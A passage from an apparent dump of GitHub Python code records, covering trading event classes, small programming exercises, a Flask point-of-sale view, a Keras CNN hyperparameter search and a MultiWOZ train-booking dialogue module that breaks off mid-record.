no negative quantities etc).\n\n        Parameters:\n        symbol - The instrument to trade.\n        order_type - 'MKT' or 'LMT' for Market or Limit.\n        quantity - Non-negative number of shares to purchase.\n        direction - Trade direction: buy or sell ('BUY' or 'SELL').\n        \"\"\"\n        self.type = 'ORDER'\n        self.symbol = symbol\n        self.order_type = order_type\n        self.quantity = quantity\n        self.direction = direction\n\n    def print_order(self):\n        \"\"\"\n        Outputs the values within the Order.\n        \"\"\"\n        print(\n            \"Order: Symbol=%s, Type=%s, Quantity=%s, Direction=%s\" % \n            (self.symbol, self.order_type, self.quantity, self.direction)\n        )\n\n\nclass FillEvent(Event):\n    \"\"\"\n    \"\"\"\n\n    def __init__(self, timeindex, symbol, exchange, quantity, \n                 direction, fill_cost, commission=None):\n        \"\"\"\n        Initialises the FillEvent object. Sets the symbol, exchange,\n        quantity, direction, cost of fill and an optional \n        commission.\n\n        If commission is not provided, the Fill object will\n        calculate it based on the trade size and Interactive\n        Brokers fees.\n\n        Parameters:\n        timeindex - The bar-resolution when the order was filled.\n        symbol - The instrument which was filled.\n        exchange - The exchange where the order was filled.\n        quantity - The filled quantity.\n        direction - The direction of fill ('BUY' or 'SELL')\n        fill_cost - The holdings value in dollars.\n        commission - An optional commission sent from IB.\n        \"\"\"\n        self.type = 'FILL'\n        self.timeindex = timeindex\n        self.symbol = symbol\n        self.exchange = exchange\n        self.quantity = quantity\n        self.direction = direction\n        self.fill_cost = fill_cost\n\n        # Calculate commission\n        if commission is None:\n            self.commission = self.calculate_ib_commission()\n        else:\n            self.commission = commission\n\n    def calculate_ib_commission(self):\n        \"\"\"\n        Calculates the fees of trading based on an Interactive\n        Brokers fee structure for API, in USD.\n\n        This does not include exchange or ECN fees.\n\n        Based on \"US API Directed Orders\":\n        https://www.interactivebrokers.com/en/index.php?f=commission&p=stocks2\n        \"\"\"\n        full_cost = 1.3\n        if self.quantity <= 500:\n            full_cost = max(1.3, 0.013 * self.quantity)\n        else: # Greater than 500\n            full_cost = max(1.3, 0.008 * self.quantity)\n        return full_cost","repo_name":"koalarobbie/Torino","sub_path":"events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"28400675524","text":"def main():\n    text = \"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. 
Arthur King Can.\"\n    text = text.replace(\",\", \"\").replace(\".\", \"\")\n    text = text.strip()\n    text = text.split()\n    word2pos = {}\n    for idx, word in enumerate(text):\n        if idx in [0, 4, 5, 6, 7, 8, 14, 15, 18]:\n            word2pos[word[:1]] = idx + 1\n        else:\n            word2pos[word[:2]] = idx + 1\n    \n    print(word2pos)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"copasta/NLP100knock2020","sub_path":"chap01/prob04.py","file_name":"prob04.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22342757787","text":"import fileinput\n\ndef main():\n    in_file = fileinput.input()\n\n    stacknum = int(in_file.readline())\n\n    sets = list()\n    for i in range(stacknum):\n        c = int(in_file.readline())\n        s1 = in_file.readline()\n        s2 = in_file.readline()\n        result = in_file.readline()\n        sets.append([c, s1, s2, result])\n\n    for i in range(len(sets)):\n        c = sets[i][0]\n        s1 = sets[i][1].strip()\n        s2 = sets[i][2].strip()\n        result = sets[i][3].strip()\n        shuffle_num = 0\n        s1_ori = s1\n        s2_ori = s2\n        while(s1 + s2 != result):\n            s1, s2 = shuffle(c, s1, s2)\n            if s1 == s1_ori and s2 == s2_ori:\n                shuffle_num = -1\n                break\n            shuffle_num += 1\n        print(str(i + 1) + \" \" + str(shuffle_num))\n\ndef shuffle(c, s1, s2):\n    combined = \"\"\n    for i in range(c):\n        combined = combined + s2[i] + s1[i]\n\n    s1 = combined[:c]\n    s2 = combined[c:]\n\n    return s1, s2\n\nmain()","repo_name":"AllenBurgett/Python-Augsburg","sub_path":"shuffle_dem_chips/Shuffle.py","file_name":"Shuffle.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7954945698","text":"import sys\ninput = sys.stdin.readline\n\nnodes = list()\narea = 0\n\nfor _ in range(int(input())):\n    nodes.append(tuple(map(float, input().split())))\n    \nx1, y1 = nodes.pop(0)\nnodes.append((x1, y1))\n\nfor x2, y2 in nodes:\n    area += ((x1 + x2) / 2) * (y2 - y1)\n    x1 = x2; y1 = y2\n    \n    \nprint(area if area >= 0 else -area)\n","repo_name":"pedro1798/BaekJoon","sub_path":"Gold/2166.py","file_name":"2166.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28966815533","text":"from flask import render_template, request, jsonify\nfrom datetime import datetime\nfrom models import db, Producto, Cajero\n\n# Temporary list holding the products in the current sale\nproductos_venta = []\n\ndef agregar_producto_venta():\n    # Read the id of the product to add from the submitted form\n    id_producto = request.form['id_producto']\n    producto = Producto.query.get(id_producto)\n\n    if producto:\n        # Add the product to the list of products in the sale\n        productos_venta.append({'id': producto.id, 'nombre': producto.nombre, 'precio': producto.precio})\n        return jsonify({'success': True, 'message': 'Producto agregado a la venta.'})\n    else:\n        return jsonify({'success': False, 'message': 'Producto no encontrado.'})\n\ndef eliminar_producto_venta(id_producto):\n    # Remove the product from the list of products in the sale\n    for producto in productos_venta:\n        if producto['id'] == id_producto:\n            productos_venta.remove(producto)\n            return jsonify({'success': True, 'message': 'Producto eliminado de la venta.'})\n    \n    return jsonify({'success': False, 'message': 'Producto no encontrado en la venta.'})\n\ndef realizar_venta():\n    # Compute the sale total by summing the prices of the products in productos_venta\n    total_venta = sum(producto['precio'] for producto in productos_venta)\n\n    # Get the current date and time\n    fecha_hora = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n    # Get the cashier's name (a fixed placeholder value is used here)\n    nombre_cajero = \"Nombre del Cajero\" # fetching the real cashier name still needs to be implemented\n\n    # Update inventory and other database processes (this part still needs to be implemented)\n\n    # Clear the list of products in the sale once the sale is completed\n    productos_venta.clear()\n\n    # Render the sale-details template and pass the values as arguments\n    return render_template('venta.html', nombre_cajero=nombre_cajero, productos_venta=productos_venta, total_venta=total_venta, fecha_hora=fecha_hora)\n","repo_name":"AntonioTap/pap","sub_path":"views/viewVenta.py","file_name":"viewVenta.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20402735162","text":"from copy import copy\n\nimport numpy as np\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\nfrom keras.models import Sequential\nfrom keras.optimizers import rmsprop, adam\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom utils import load_data, calculate_class_weight\n\nHP_SPACE = {\n    'filters_1': [16, 32, 48],\n    'filters_2': [16, 32, 48],\n    'kernel_1': [5, 7, 9],\n    'kernel_2': [3, 5, 7, 9],\n    'pooling_1': [5, 6, 7],\n    'pooling_2': [1, 2, 3],\n    'beta_1': [1 - (10 ** (-p)) for p in range(1, 3)],\n    'beta_2': [1 - (10 ** (-p)) for p in range(2, 5)],\n    'eps': [10 ** (-p) for p in range(10, 13)],\n    'learning_rate': [10 ** (-p) for p in [2.5, 3, 3.5, 4]],\n    'rho': [1 - (10 ** (-p)) for p in [1, 1.5, 2]],\n    'decay': [10 ** (-p) for p in range(1, 4)],\n    'hidden_units': [64, 128, 192, 256, 320],\n    'activation': ['relu', 'tanh'],\n    'use_img_augmentation': [False, True],\n    'use_adam': [False, True],\n    'use_dropout': [False, True],\n    'use_class_weight': [False, True],\n    'use_lr_reduction': [False, True],\n    }\n\nclass HyperparametersHandler():\n    def __init__(self, initial_parameters=None):\n        self.space = HP_SPACE\n        # sample a random starting value from each hyperparameter's choice list\n        # (the values themselves, not indices, since _get_adjacent_list_item\n        # looks the current value up with choice_list.index)\n        self.current = initial_parameters or {key: self.space[key][np.random.randint(0, len(self.space[key]))] for key in self.space.keys()}\n        self.best = None\n\n    @staticmethod\n    def _get_adjacent_list_item(choice_list, current_value):\n        return choice_list[max(0, min(len(choice_list) - 1, choice_list.index(current_value) + np.random.randint(-1, 2)))]\n\n    def modify_hyperparams(self):\n        new_hyperparams = copy(self.current)\n        parameters = [key for key in self.space.keys() if key not in ('beta_1', 'beta_2', 'eps', 'rho', 'decay')]\n\n        for parameter in parameters:\n            new_hyperparams[parameter] = self._get_adjacent_list_item(self.space[parameter], self.current[parameter])\n\n        if new_hyperparams['use_adam']:\n            for parameter in ['beta_1', 'beta_2', 'eps']:\n                new_hyperparams[parameter] = self._get_adjacent_list_item(self.space[parameter], self.current[parameter])\n        else:\n            for parameter in ['rho', 'decay']:\n                new_hyperparams[parameter] = self._get_adjacent_list_item(self.space[parameter], self.current[parameter])\n\n        self.current = new_hyperparams\n\n    def save_best(self):\n        self.best = copy(self.current)\n\n\nclass CrossValidator():\n    def __init__(self, n_splits, hyperparams, epochs=4):\n        
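        # n_splits: number of stratified folds; hyperparams: one configuration drawn\n        # from HP_SPACE (e.g. a HyperparametersHandler().current dict); epochs: training\n        # epochs per fold. Typical use: CrossValidator(5, handler.current).run(images, labels, class_weight)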
self.n_splits = n_splits\n self.hyperparams = hyperparams\n self.epochs = epochs\n\n def run(self, images, labels, class_weight):\n folds = list(StratifiedKFold(n_splits=self.n_splits, shuffle=True, random_state=2018).split(images, np.argmax(labels, axis=1)))\n val_scores = []\n for train_idx, validation_idx in folds:\n images_tr = images[train_idx]\n labels_tr = labels[train_idx]\n images_val = images[validation_idx]\n labels_val = labels[validation_idx]\n\n classifier_trainer = ClassifierTrainer(self.hyperparams)\n classifier_trainer.build_classifier()\n classifier_trainer.compile_classifier()\n classifier_trainer.fit_classifier(images_tr, labels_tr, images_val, labels_val, self.epochs, class_weight)\n\n val_scores.append(classifier_trainer.classifier.evaluate(images_val, labels_val))\n\n return val_scores\n\n\n\nclass ClassifierTrainer:\n def __init__(self, hyperparams, batch_size=32):\n self.hp = hyperparams\n self.batch_size = batch_size\n self.classifier = None\n\n def build_classifier(self):\n self.classifier = Sequential()\n self.classifier.add(\n Conv2D(filters=self.hp['filters_1'], kernel_size=(self.hp['kernel_1'], self.hp['kernel_1']),\n padding='Same', activation=self.hp['activation'], input_shape=(56, 56, 1)))\n self.classifier.add(\n Conv2D(filters=self.hp['filters_1'], kernel_size=(self.hp['kernel_1'], self.hp['kernel_1']),\n padding='Same', activation='relu'))\n self.classifier.add(MaxPool2D(pool_size=(self.hp['pooling_1'], self.hp['pooling_1']), padding='same'))\n if self.hp['use_dropout']:\n self.classifier.add(Dropout(0.25))\n\n self.classifier.add(\n Conv2D(filters=self.hp['filters_2'], kernel_size=(self.hp['kernel_2'], self.hp['kernel_2']),\n padding='Same', activation=self.hp['activation']))\n self.classifier.add(\n Conv2D(filters=self.hp['filters_2'], kernel_size=(self.hp['kernel_2'], self.hp['kernel_2']),\n padding='Same', activation=self.hp['activation']))\n self.classifier.add(MaxPool2D(pool_size=(self.hp['pooling_2'], self.hp['pooling_2']), padding='same'))\n if self.hp['use_dropout']:\n self.classifier.add(Dropout(0.25))\n\n self.classifier.add(Flatten())\n self.classifier.add(Dense(self.hp['hidden_units'], activation=self.hp['activation']))\n if self.hp['use_dropout']:\n self.classifier.add(Dropout(0.5))\n self.classifier.add(Dense(36, activation=\"softmax\"))\n\n def compile_classifier(self):\n self.classifier.compile(self._optimizer, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n\n @property\n def _optimizer(self):\n if self.hp['use_adam']:\n optimizer = adam(lr=self.hp['learning_rate'], beta_1=self.hp['beta_1'], beta_2=self.hp['beta_2'],\n epsilon=self.hp['eps'])\n else:\n optimizer = rmsprop(lr=self.hp['learning_rate'], rho=self.hp['rho'], epsilon=self.hp['eps'],\n decay=self.hp['decay'])\n return optimizer\n\n @property\n def _callbacks(self):\n callbacks = []\n reduce_lr_callback = ReduceLROnPlateau(monitor='val_acc', patience=3, verbose=1, factor=0.5, min_lr=0.00001)\n early_stopping = EarlyStopping(monitor='acc')\n return [reduce_lr_callback] if self.hp['use_lr_reduction'] else None\n\n def fit_classifier(self, images_tr, labels_tr, images_val=None, labels_val=None, epochs=10, class_weight=None):\n cw = class_weight if self.hp['use_class_weight'] else None\n\n if self.hp['use_img_augmentation']:\n self._fit(images_tr, labels_tr, images_val, labels_val, epochs, cw)\n else:\n self._fit_generator(images_tr, labels_tr, images_val, labels_val, epochs, cw)\n\n def _fit(self, images_tr, labels_tr, images_val, labels_val, epochs, class_weight):\n 
self.classifier.fit(images_tr, labels_tr, batch_size=self.batch_size, epochs=epochs, callbacks=self._callbacks,\n validation_data=(images_val, labels_val), shuffle=True, class_weight=class_weight)\n\n def _fit_generator(self, images_tr, labels_tr, images_val, labels_val, epochs, class_weight):\n data_generator = ImageDataGenerator(rotation_range=10, zoom_range=0.10,\n width_shift_range=0.10, height_shift_range=0.10)\n data_generator.fit(images_tr)\n self.classifier.fit_generator(data_generator.flow(images_tr, labels_tr, batch_size=self.batch_size),\n validation_data=(images_val, labels_val), epochs=epochs, callbacks=self._callbacks,\n class_weight=class_weight)\n\n\n\nclass ClassifierOptimizer():\n def __init__(self, initial_hyperparams=None):\n self.hyperparams_handler = HyperparametersHandler(initial_hyperparams)\n self.best_cv_score = 0\n self.best_hyperparams = None\n\n def run_optimization(self, rounds, images, labels, class_weight):\n for iteration in range(rounds):\n try:\n cv_score = self._get_cv_score(images, labels, class_weight)\n\n with open('saved.txt', 'a') as f:\n log_msg = ' '.join([str(cv_score > self.best_cv_score), str(self.hyperparams_handler.current), 'SCORE:', str(cv_score), '\\n\\n'])\n f.write(log_msg)\n\n if cv_score > self.best_cv_score:\n self._save_best(cv_score)\n\n except Exception as e:\n with open('errors.txt', 'a') as f:\n f.write(str(e) + '\\n' + '#' * 50 + '\\n')\n\n self.hyperparams_handler.modify_hyperparams()\n\n def _get_cv_score(self, images, labels, class_weight):\n cv = CrossValidator(4, self.hyperparams_handler.current)\n scores = cv.run(images, labels, class_weight)\n return np.mean([score[1] for score in scores])\n\n\n def _save_best(self, new_best_cv_score):\n self.best_cv_score = new_best_cv_score\n self.hyperparams_handler.save_best()\n\n\nif __name__ == '__main__':\n images, labels = load_data('train_sample.pkl')\n images = images.reshape(-1, 56, 56, 1)\n class_weight = calculate_class_weight(labels)\n labels = to_categorical(labels, num_classes=36)\n\n images_tst, labels_tst = load_data('test_sample.pkl')\n images_tst = images_tst.reshape(-1, 56, 56, 1)\n labels_tst = to_categorical(labels_tst, num_classes=36)\n\n initial_hyperparams = dict()\n initial_hyperparams['filters_1'] = HP_SPACE['filters_1'][1]\n initial_hyperparams['filters_2'] = HP_SPACE['filters_2'][2]\n initial_hyperparams['pooling_1'] = HP_SPACE['pooling_1'][0]\n initial_hyperparams['pooling_2'] = HP_SPACE['pooling_2'][2]\n initial_hyperparams['kernel_1'] = HP_SPACE['kernel_1'][1]\n initial_hyperparams['kernel_2'] = HP_SPACE['kernel_2'][2]\n initial_hyperparams['beta_1'] = HP_SPACE['beta_1'][0]\n initial_hyperparams['beta_2'] = HP_SPACE['beta_2'][1]\n initial_hyperparams['eps'] = HP_SPACE['eps'][1]\n initial_hyperparams['learning_rate'] = HP_SPACE['learning_rate'][1]\n initial_hyperparams['rho'] = HP_SPACE['rho'][0]\n initial_hyperparams['decay'] = HP_SPACE['decay'][2]\n initial_hyperparams['hidden_units'] = HP_SPACE['hidden_units'][2]\n initial_hyperparams['activation'] = HP_SPACE['activation'][1]\n\n initial_hyperparams['use_adam'] = HP_SPACE['use_adam'][0]\n initial_hyperparams['use_dropout'] = HP_SPACE['use_dropout'][1]\n initial_hyperparams['use_class_weight'] = HP_SPACE['use_class_weight'][0]\n initial_hyperparams['use_lr_reduction'] = HP_SPACE['use_lr_reduction'][0]\n initial_hyperparams['use_img_augmentation'] = HP_SPACE['use_img_augmentation'][1]\n\n # classifier_optimizer = ClassifierOptimizer(initial_hyperparams)\n # classifier_optimizer.run_optimization(50, images, 
labels, class_weight)\n\n classifier_trainer = ClassifierTrainer(initial_hyperparams)\n classifier_trainer.build_classifier()\n classifier_trainer.compile_classifier()\n classifier_trainer.fit_classifier(images, labels, images_tst, labels_tst, epochs=20, class_weight=class_weight)\n # classifier = train_classifier(images, labels, images_tst, labels_tst, initial_hyperparams, class_weight, epochs=10)\n classifier_trainer.classifier.save('keras_cnn_model_2.h5')","repo_name":"hubert-jaworski/amRecruitmentTask","sub_path":"keras_cnn.py","file_name":"keras_cnn.py","file_ext":"py","file_size_in_byte":11325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"1555704859","text":"from opendf.applications.multiwoz_2_2.nodes.multiwoz import *\nfrom opendf.applications.multiwoz_2_2.utils import *\nfrom opendf.graph.nodes.framework_functions import revise, duplicate_subgraph\nfrom opendf.utils.utils import Message\n\nif use_database:\n multiwoz_db = MultiWozSqlDB.get_instance()\nelse:\n multiwoz_db = MultiWOZDB.get_instance()\nnode_fact = NodeFactory.get_instance()\nenvironment_definitions = EnvironmentDefinition.get_instance()\n\n\nmap_train_slots = {\n \"train-departure\": \"departure=%s\" if EXTRACT_SIMP else \"departure=LIKE(Location(%s))\",\n \"train-destination\": \"destination=%s\" if EXTRACT_SIMP else \"destination=LIKE(Location(%s))\",\n \"train-duration\": \"duration=%s\" if EXTRACT_SIMP else \"duration=LIKE(Duration({escape_string(value)}))\",\n \"train-day\": \"day=%s\",\n \"train-arriveby\": \"arriveby=%s\" if EXTRACT_SIMP else \"arriveby=ArriveBy(%s)\",\n \"train-leaveat\": \"leaveat=%s\" if EXTRACT_SIMP else \"leaveat=LeaveAt(%s)\",\n \"train-price\": \"price=%s\",\n \"train-bookpeople\": \"bookpeople=%s\",\n \"train-booktime\": \"booktime=%s\",\n}\n\nmap_train_inputs = {\n \"departure\": 'leaving from %s',\n \"destination\": 'going to %s',\n \"duration\": 'taking %s',\n \"day\": 'on %s',\n \"arriveby\": 'arriving at %s',\n \"leaveat\": 'leaving at %s',\n \"price\": 'costing %s',\n \"bookpeople\": 'for %s people',\n \"booktime\": 'on %s',\n 'trainid': 'with train id %s',\n}\n\n\nclass Train(MultiWOZDomain):\n def __init__(self, typ=None):\n typ = typ if typ else type(self)\n super().__init__(typ)\n self.signature.add_sig('departure', Location)\n self.signature.add_sig('destination', Location)\n self.signature.add_sig('leaveat', MWOZTime)\n self.signature.add_sig('arriveby', MWOZTime)\n self.signature.add_sig('day', Book_day) # changed from Str - easier to reuse value for hotel, restaurant\n # the fields below come from the system\n self.signature.add_sig('duration', Duration)\n self.signature.add_sig('price', Float)\n self.signature.add_sig('trainid', TrainID)\n\n @staticmethod\n def gen_get_field_str_format(name, prms=None):\n return gen_get_field_str_format(name, map_train_inputs)\n\n @staticmethod\n def gen_show_options():\n return ['departure', 'destination', 'leaveat', 'arriveby', 'trainid']\n\n @staticmethod\n def gen_get_alternative_values(name, prms=None):\n if name=='departure':\n return ['london', 'manchester', 'oxford']\n if name=='destination':\n return ['london', 'manchester', 'oxford']\n if name=='leaveat':\n return ['10:00', '11:00', '12:00']\n if name=='arriveby':\n return ['10:00', '11:00', '12:00']\n if name=='day':\n return ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday']\n return []\n\n def get_context_values(self, inform_values=None, req_fields=None):\n slot_values = {}\n for name in self.inputs:\n 
element = []\n if name in {'arriveby', 'leaveat'}:\n node = next(filter(lambda x: x.typename() in {\"Time\", \"MWOZTime\"}, self.input_view(name).topological_order()), None)\n if isinstance(node, Time):\n p_time = node.to_Ptime()\n element.append(f\"{p_time.hour:02d}:{p_time.minute:02d}\")\n elif isinstance(node, MWOZTime):\n time_str = node.get_dat(posname(1)).split()[-1]\n match = TIME_REGEX.match(time_str)\n if match is None:\n hour, minute = 0, 0 # problem\n else:\n hour, minute = match.groups()\n element.append(f\"{int(hour) % 24:02d}:{int(minute) % 60:02d}\")\n else:\n node = next(filter(lambda x: x.typename() == \"Str\", self.input_view(name).topological_order()), None)\n if node:\n element.append(node.dat)\n slot_values[f'train-{name.lower()}'] = element\n\n return slot_values\n\n def generate_sql_select(self):\n return select(MultiWozSqlDB.TRAIN_TABLE)\n\n def generate_sql_where(self, selection, parent_id, **kwargs):\n if 'arriveby' in self.inputs:\n selection = self.input_view(\"arriveby\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.arriveby, **kwargs)\n\n if 'day' in self.inputs:\n selection = self.input_view(\"day\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.day, **kwargs)\n\n if 'departure' in self.inputs:\n selection = self.input_view(\"departure\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.departure, **kwargs)\n\n if 'destination' in self.inputs:\n selection = self.input_view(\"destination\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.destination, **kwargs)\n\n if 'duration' in self.inputs:\n selection = self.input_view(\"duration\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.duration, **kwargs)\n\n if 'leaveat' in self.inputs:\n selection = self.input_view(\"leaveat\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.leaveat, **kwargs)\n\n if 'price' in self.inputs:\n selection = self.input_view(\"price\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.price, **kwargs)\n\n if 'trainid' in self.inputs:\n selection = self.input_view(\"trainid\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.trainid, **kwargs)\n\n return selection\n\n def graph_from_row(self, row, context):\n params = []\n for field in self.signature.keys():\n value = row[field]\n if value and field in ['leaveat', 'arriveby']:\n s = str(value).split()[1].split(':')\n value = ':'.join(s[:2])\n if value:\n if isinstance(value, str):\n value = escape_string(value)\n params.append(f\"{field}={value}\")\n\n node_str = f\"Train({', '.join(params)})\"\n g, _ = Node.call_construct_eval(node_str, context, constr_tag=NODE_COLOR_DB)\n g.tags[DB_NODE_TAG] = 0\n return g\n\n # def describe(self, params=None):\n # prms = []\n # dep, dest, leave, arr, day, dur, price, tid = \\\n # self.get_dats(['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration', 'price', 'trainid'])\n # prms.append(tid if tid else 'the train')\n # if dep:\n # prms.append('from %s' % dep)\n # if dest:\n # prms.append('to %s' % dest)\n # if day:\n # prms.append('on %s' % day)\n # if leave:\n # prms.append('leaves at %s' % leave)\n # if arr:\n # prms.append('arrives at %s' % arr)\n # if price:\n # prms.append('costs %s' % price)\n # return Message(', '.join(prms), objects=[self])\n\n def describe(self, params=None):\n prms = []\n tid = self.get_dats(['trainid'])\n prms.append(tid if tid else 'the train')\n for i in ['departure', 'destination', 'day', 'leaveat', 
'arriveby', 'price']:\n dt = self.get_dat(i)\n if dt:\n prms.append(map_train_inputs[i] % dt)\n return Message(', '.join(prms), objects=[self])\n\n def getattr_yield_msg(self, attr, val=None, plural=None, params=None):\n return self.describe(params=params)\n\n def collect_state(self):\n do_collect_state(self, 'train')\n\n def gen_field_opts(self, node_name, prms=None):\n opts = []\n add_field_opt(opts, self, 'departure', 0)\n add_field_opt(opts, self, 'destination', 0)\n add_field_opt(opts, self, 'day', 0)\n add_field_opt(opts, self, 'leaveat', 0)\n add_field_opt(opts, self, 'arriveby', 0)\n if True or prms and 'full' in prms:\n add_field_opt(opts, self, 'price', -0.2)\n add_field_opt(opts, self, 'trainid', -0.2)\n add_field_opt(opts, self, 'duration', -0.2)\n return opts\n\n # replace slot value with a random (but valid) value for the given opt\n @staticmethod\n def get_alternative_opt_value(opt):\n slot, txt = opt\n if '=' in slot:\n slot = slot.split('=')[0]\n vals = Train.gen_get_alternative_values(slot)\n if vals:\n val = random.choice(vals)\n return '%s=%s' % (slot, val), Train.gen_get_field_str_format(slot) % val\n return opt\n\n###################################################################\n\n\nclass TrainBookInfo(Node):\n def __init__(self):\n super().__init__(type(self))\n self.signature.add_sig('bookpeople', Book_people)\n\n @staticmethod\n def gen_get_field_str_format(name, prms=None):\n if name=='bookpeople':\n return 'for %s people'\n return ''\n\n @staticmethod\n def gen_show_options():\n return ['bookpeople']\n\n @staticmethod\n def gen_get_alternative_values(name, prms=None):\n if name=='bookpeople':\n return ['1', '2', '3', '4']\n return []\n\n def get_context_values(self, inform_values=None, req_fields=None):\n slot_values = {}\n for name in self.inputs:\n element = next(filter(lambda x: x.typename() == \"Str\", self.input_view(name).topological_order()), None)\n #name = 'book' + name[5:] if name.startswith('book_') else name\n slot_values[f'train-{name}'] = [element.dat] if element else []\n if inform_values:\n for k in inform_values:\n slot_values['train-'+k] = inform_values[k]\n return slot_values\n\n def collect_state(self):\n do_collect_state(self, 'train', 'book')\n\n\n def gen_field_opts(self, node_name, prms=None):\n opts = []\n add_field_opt(opts, self, 'bookpeople', 0)\n return opts\n\n # replace slot value with a random (but valid) value for the given opt\n @staticmethod\n def get_alternative_opt_value(opt):\n slot, txt = opt\n if '=' in slot:\n slot = slot.split('=')[0]\n vals = TrainBookInfo.gen_get_alternative_values(slot)\n if vals:\n val = random.choice(vals)\n # return '%s=%s' % (slot, val), TrainBookInfo.gen_get_field_str_format(slot) % val\n return '%s=%s' % (slot, val), gen_get_field_str_format(slot, map_train_inputs) % val\n return opt\n\n\nclass BookTrainConfirmation(Node):\n def __init__(self):\n super().__init__(type(self))\n self.signature.add_sig('train', Train)\n self.signature.add_sig('book_info', TrainBookInfo)\n self.signature.add_sig('conf_code', Str)\n\n def describe(self, params=None):\n s = ['Train resevation: ']\n m1 = self.input_view('train').describe(params=['compact'])\n m2 = self.input_view('book_info').describe()\n s.append(m1.text)\n s.append(m2.text)\n s.append('Confirmation code: ' + self.get_dat('conf_code'))\n return Message(' NL '.join(s), objects=m1.objects+m2.objects)\n\n def collect_state(self):\n self.inputs['train'].collect_state()\n self.inputs['book_info'].collect_state()\n do_collect_state(self, 'train', 'book') 
# add conf code directly\n\n\ndef check_train_availability(train, binf, book_fields):\n if environment_definitions.agent_oracle:\n if 'ref' in book_fields:\n return True, book_fields['ref']\n if 'nobook' in book_fields:\n return False, None\n return True, 'XYZ%12345' # % random.randint(1000000, 9000000)\n\n\nclass BookTrain(Node):\n def __init__(self):\n super().__init__(BookTrainConfirmation)\n self.signature.add_sig('train', Train)\n self.signature.add_sig('book_info', TrainBookInfo)\n # maybe wrap the book info inputs into a node?\n self.inc_count('max_inform_tid', 1)\n\n # todo - add agent_oracle mode!\n def exec(self, all_nodes=None, goals=None):\n #self.update_mwoz_state()\n\n if 'train' not in self.inputs:\n raise MissingValueException('train', self, 'Please specify which train you are looking for')\n train = self.input_view('train')\n context = self.context\n\n # maybe: in case of failed booking, then inform what needs to change? todo\n fields = ['bookpeople', 'ref']\n inform_fields = {}\n req_fields = {}\n book_fields = {}\n if environment_definitions.agent_oracle:\n dact = context.agent_turn['dialog_act']['dialog_act']\n atext = context.agent_turn['utterance']\n # 1. try to understand what the agent did -\n for d in dact:\n dom, typ = d.split('-')\n if dom=='xxBooking':\n pass # todo\n elif dom=='Train' or dom=='Booking':\n if typ == 'Inform':\n for [k, v] in dact[d]:\n if k in fields:\n inform_fields[k] = v\n if typ in ['Book', 'OfferBooked']:\n for [k, v] in dact[d]:\n if k in fields:\n book_fields[k] = v\n if typ == 'NoBook':\n book_fields['nobook'] = 'True'\n if typ == 'Request':\n for [k, v] in dact[d]:\n if k in fields:\n req_fields[k] = v\n\n if environment_definitions.oracle_only:\n # return the original message of the agent,\n #self.update_mwoz_state(inform_fields, req_fields)\n raise OracleException(atext, self)\n\n msg = ''\n if self.count_ok('inform_tid'):\n self.inc_count('inform_tid')\n msg = 'OK, ' + train.describe().text + '. NL '\n if 'book_info' not in self.inputs: # should not be the case when using the \"normal\" initialization (fallback search)\n d, e = self.call_construct('TrainBookInfo()', self.context)\n d.connect_in_out('book_info', self)\n binf = self.inputs['book_info']\n if 'bookpeople' not in binf.inputs:\n raise MissingValueException('bookpeople', self, msg+'For how many people?')\n # if 'bookday' not in binf.inputs:\n # raise MissingValueException(msg+'On which day?', self)\n ok, conf_code = check_train_availability(train, binf, book_fields)\n #self.update_mwoz_state(inform_fields, req_fields)\n if ok:\n d, e = self.call_construct_eval('BookTrainConfirmation(train=%s, book_info=%s, conf_code=%s)' %\n (id_sexp(train), id_sexp(binf), conf_code), self.context)\n self.set_result(d)\n self.context.add_message(self, 'I have made the reservation as requested. confirmation ref %s' % conf_code)\n else:\n # todo - if oracle - say what failed / what is needed\n raise InvalidInputException('Unfortunately the train can not confirm this booking. 
